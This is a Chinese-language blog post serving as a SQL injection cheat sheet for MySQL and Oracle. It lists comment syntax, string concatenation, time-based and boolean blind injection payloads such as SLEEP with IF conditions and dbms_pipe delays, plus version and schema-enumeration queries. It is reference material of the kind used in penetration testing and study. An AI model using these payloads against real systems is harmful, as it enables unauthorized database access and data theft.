sql注入时，关于各个数据库的关键知识点-CSDN博客

本文链接：https://blog.csdn.net/2201_75445650/article/details/147543110

在网络安全领域，SQL 注入（SQL Injection）是一种非常经典且常见的攻击方式。而想要进行有效的 SQL 注入，熟悉不同数据库的基本特点和差异是非常重要的。

在实际攻击或测试过程中，目标系统后端使用的数据库类型可能不同，如 MySQL、Oracle、SQL Server、PostgreSQL、SQLite 等。
不同数据库在：

字符串拼接：
使用 CONCAT('a', 'b') 进行字符串连接。
'a' 'b' 注意中间的空格
注释：
单行注释：-- （注意后面跟空格）
另一种：#，/*abc*/
盲注常用技巧：
SLEEP(5) 实现延时注入。
SELECT IF(YOUR-CONDITION-HERE,SLEEP(10),'a') 实现条件延时
特有函数：
SUBSTRING(str, pos, len) 提取子串。
LENGTH(str) 计算字符串长度。
常用查询语句：
SELECT @@version 查询数据库版本
SELECT * FROM information_schema.table 查询数据库中信息
SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME' 查询数据库中特定表中信息
SELECT IF(YOUR-CONDITION-HERE,(SELECT table_name FROM information_schema.tables),'a') 条件判断，布尔盲注
常见错误识别：
报错信息中经常出现 You have an error in your SQL syntax。

特点：容错性高，注释灵活，注入 payload 构造比较简单。

注释：
-- 也是Oracle注释，但小心空格问题。
字符串拼接：
使用 || 进行拼接，如 'abc' || 'def'。
特有表：
dual，用于没有 FROM 子句时补充，比如 SELECT 1 FROM dual。
常用查询语句：
SUBSTR(str, pos, len) 提取子串。
SELECT banner FROM v$version,SELECT version FROM v$instance 查询数据库版本
SELECT * FROM all_tables查询数据库中信息
SELECT * FROM all_tab_columns WHERE table_name = 'TABLE-NAME-HERE' 查询数据库中特定表中信息
盲注常用技巧：
1.利用条件触发异常，例如：TO_CHAR(1/0) 造成除零错误。
2.dbms_pipe.receive_message(('a'),10) 延时
3.SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 'a'||dbms_pipe.receive_message(('a'),10) ELSE NULL END FROM dual 条件延时
常见限制：
不允许 SELECT 返回多行；需要 ROWNUM=1 限制。